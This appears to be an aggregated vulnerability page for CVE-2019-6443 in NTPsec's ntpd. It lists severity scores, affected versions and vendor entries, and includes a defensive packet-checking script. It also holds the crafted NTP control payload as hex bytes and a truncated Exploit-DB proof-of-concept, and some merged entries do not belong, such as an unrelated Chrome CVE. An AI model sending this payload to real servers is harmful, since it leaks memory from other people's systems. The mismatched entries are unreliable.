CVE-2019-6443
Published: 2019-01-16
Priority: P180 · critical · 9.1 (CVSS 3.0)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:H
ITW · EXPLOIT · VulnCheck KEV · Exploited in the wild
EPSS: 66.88% (99.2th percentile)
An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem, there is a stack-based buffer over-read in read_sysvars in ntp_control.c in ntpd.
Affected (7 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | ntpsec | < ntpsec 1.1.3+dfsg1-1 (bookworm) | ntpsec 1.1.3+dfsg1-1 (bookworm) |
| chrome_chrome | — | — | |
| ntpsec | ntpsec | < 1.1.3 | 1.1.3 |
| ntpsec | ntpsec | >= 0 < 1.1.3+dfsg1-1 | 1.1.3+dfsg1-1 |
| ntpsec | ntpsec | >= 0 < 1.1.3+dfsg1-1 | 1.1.3+dfsg1-1 |
| ntpsec | ntpsec | >= 0 < 1.1.3+dfsg1-1 | 1.1.3+dfsg1-1 |
| ntpsec | ntpsec | >= 0 < 1.1.3+dfsg1-1 | 1.1.3+dfsg1-1 |
Detection & IOCs (extracted from sources)
Bytes:
4e0203ec0000000000000002c774633d1000af2c2c2c2cfa0000fa0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b060b0bce0b140b0b0b0b0b0b0b0b0b0b0b0b0b0b0b210b0b0b0b0b0b0b0b0b0b0b0b0b0b0b060b0bce0b0b0b0b0b0b0b0b0b0be4e4e50b0b0b0b200b0b0b0b0b0b0b3d633dac0b0b0b0b2d270b0b0b0b0b0b0b0b0b0b0b0b0b800b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0bff0b
Bytes:
160203e80000000000000000
- Send crafted NTP control request (mode 6) UDP payload to port 123 and check the response for the 'ntpsec' banner string to identify vulnerable NTPsec instances; a version string below 1.1.3 confirms vulnerability.
- Extract the NTPsec version from the ntpd response banner using the regex pattern 'ntpd ntpsec-([0-9.]+)' and flag versions less than 1.1.3.
- The Shodan query 'ntpsec' can be used to identify internet-exposed NTPsec instances for passive detection.
- The exploit sends an oversized crafted NTP control (mode 6) UDP datagram to trigger the stack-based buffer over-read in ctl_getitem/read_sysvars; monitor for anomalously large or malformed NTP control packets on UDP/123.
- Affected versions are ntpsec 1.1.1 and 1.1.2; any response identifying these versions should be treated as vulnerable.
- The PoC explicitly notes it does not crash the target, meaning exploitation is stealthy and may not produce obvious crash/error indicators in logs.
- The vulnerability is in the NTP control protocol (mode 6), which may be accessible remotely; ensure NTP control queries are restricted by ACL in the ntpd configuration.
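The "anomalously large or malformed NTP control packet" check from the notes above, as an added defensive example (not code from this page, the PoC author, or the NTPsec project): it parses the 12-byte NTP mode 6 control header and flags requests whose declared count disagrees with the actual data length, whose readvar data exceeds a threshold chosen here (64 bytes is an assumption, not an NTPsec constant), or whose data is not printable text. The two sample datagrams are constructed, modelled on the header bytes of the two byte sequences listed above.

```python
import struct

# 12-byte NTP mode 6 (control) header: LI/VN/Mode, R/E/M/opcode, sequence,
# status, association id, offset, count (count = length of the data that follows).
CTL_HDR = struct.Struct("!BBHHHHH")
MODE_CONTROL = 6
OP_READVAR = 2
# Threshold for "anomalously large" readvar data; chosen for this example, not taken from the page.
MAX_READVAR_DATA = 64


def parse_control(pkt):
    """Return the header fields of an NTP control datagram, or None if it is not mode 6."""
    if len(pkt) < CTL_HDR.size:
        return None
    b0, b1, seq, status, assoc, offset, count = CTL_HDR.unpack_from(pkt)
    if b0 & 0x07 != MODE_CONTROL:
        return None
    return {
        "version": (b0 >> 3) & 0x07,
        "response": bool(b1 & 0x80), "error": bool(b1 & 0x40), "more": bool(b1 & 0x20),
        "opcode": b1 & 0x1F,
        "sequence": seq, "status": status, "assoc": assoc, "offset": offset,
        "count": count,
        "data": pkt[CTL_HDR.size:],
    }


def control_findings(pkt):
    """Reasons an inbound mode 6 request looks malformed; an empty list means it looks benign."""
    h = parse_control(pkt)
    if h is None or h["response"]:
        return []
    data, findings = h["data"], []
    if h["count"] != len(data):
        findings.append("count %d != data length %d" % (h["count"], len(data)))
    if h["opcode"] == OP_READVAR and len(data) > MAX_READVAR_DATA:
        findings.append("readvar data %d bytes exceeds %d" % (len(data), MAX_READVAR_DATA))
    # A readvar variable list is printable text ("version,peers,..."); binary filler is a red flag.
    if any(not (0x20 <= c < 0x7F) and c not in b"\r\n" for c in data):
        findings.append("non-printable bytes in control data")
    return findings


# Constructed samples modelled on the two byte sequences listed above: the header of the
# crafted request (count=2) followed by 100 bytes of 0x0b filler, and the short probe (count=0).
CRAFTED = bytes.fromhex("4e0203ec0000000000000002") + b"\x0b" * 100
PROBE = bytes.fromhex("160203e80000000000000000")

if __name__ == "__main__":
    for name, pkt in (("crafted", CRAFTED), ("probe", PROBE)):
        print(name, control_findings(pkt) or "looks benign")
```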
CVSS provenance
- nvd v3.0: 9.1 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H)
- nvd v2.0: 6.4 MEDIUM (AV:N/AC:L/Au:N/C:P/I:N/A:P)
- osv: 9.1 CRITICAL
- vulncheck: 9.1 CRITICAL
- vendor_debian: 9.1 CRITICAL
Chrome
Stable Channel Update for Desktop: CVE-2020-6443
vendor_chrome · 2020-04-07 · CVSS 8.8 · [LOW]
CVE-2020-6443: Insufficient data validation in developer tools. Reported by @lovasoa (Ophir LOJKINE) on 2020-01-08
[$N/A][922882] Low CVE-2020-6444: Uninitialized Use in WebRTC. Reported by mlfbrown on 2019-01-17
Severity: low
Debian
CVE-2019-6443: ntpsec
vendor_debian · 2019 · CVSS 9.1 · [CRITICAL]
An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem, there is a stack-based buffer over-read in read_sysvars in ntp_control.c in ntpd.
Scope: local
bookworm: resolved (fixed in 1.1.3+dfsg1-1)
bullseye: resolved (fixed in 1.1.3+dfsg1-1)
forky: resolved (fixed in 1.1.3+dfsg1-1)
sid: resolved (fixed in 1.1.3+dfsg1-1)
trixie: resolved (fixed in 1.1.3+dfsg1-1)
GHSA
GHSA-v24q-v22h-25r2
ghsa_unreviewed · 2022-05-14 · [CRITICAL] · CWE-125
An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem, there is a stack-based buffer over-read in read_sysvars in ntp_control.c in ntpd.
OSV
CVE-2019-6443
osv · 2019-01-16 · CVSS 9.1 · [CRITICAL]
An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem, there is a stack-based buffer over-read in read_sysvars in ntp_control.c in ntpd.
VulnCheck
ntpsec ntpsec Out-of-bounds Read
vulncheck · 2019 · CVSS 9.1 · [CRITICAL]
An issue was discovered in NTPsec before 1.1.3. Because of a bug in ctl_getitem, there is a stack-based buffer over-read in read_sysvars in ntp_control.c in ntpd.
Affected: ntpsec ntpsec
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.zscaler.com/resources/industry-reports/non-web-attack-surface-report.pdf
No detection rules found.
Exploit-DB
NTPsec 1.1.2 - 'ctl_getitem' Out-of-Bounds Read (PoC)
exploitdb · 2019-01-16 · CVSS 9.1 · [CRITICAL]
---
```python
#!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 OOB read Proof of concept
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/bugs/ntpsec-oobread1
# Vendor Homepage: https://ntpsec.org/
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
# Affected versions: ntpsec 1.1.1, 1.1.2
# CVE: CVE-2019-6443
# Note: this PoC does not crash the target
import sys
import socket
buf = ("\x4e\x02\x03\xec\x00\x00\x00\x00\x00\x00\x02\xc7\x74\x63\x3d\x10" +
"\x00\xaf\x2c\x2c\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x
```
Nuclei
NTPsec > 1.1.3 - 'ctl_getitem' Out-of-Bounds Read
nuclei · CVSS 9.1 · [CRITICAL]
NTPsec before 1.1.3 contains a stack-based buffer over-read caused by a bug in ctl_getitem in read_sysvars in ntp_control.c in ntpd, letting local or remote attackers read sensitive memory, exploit requires sending crafted control requests.
Template:
```yaml
id: CVE-2019-6443
info:
  name: NTPsec > 1.1.3 - 'ctl_getitem' Out-of-Bounds Read
  author: pussycat0x,0x_Akoko
  severity: critical
  description: |
    NTPsec before 1.1.3 contains a stack-based buffer over-read caused by a bug in ctl_getitem in read_sysvars in ntp_control.c in ntpd, letting local or remote attackers read sensitive memory, exploit requires sending crafted control requests.
  impact: |
    Attackers can read sensitive memory contents, potentially leading to information disclosure or further
```
No writeups or analysis indexed.
References:
- https://dumpco.re/blog/ntpsec-bugs
- https://dumpco.re/bugs/ntpsec-oobread1
- https://github.com/ntpsec/ntpsec/blob/NTPsec_1_1_3/NEWS
- https://www.exploit-db.com/exploits/46175/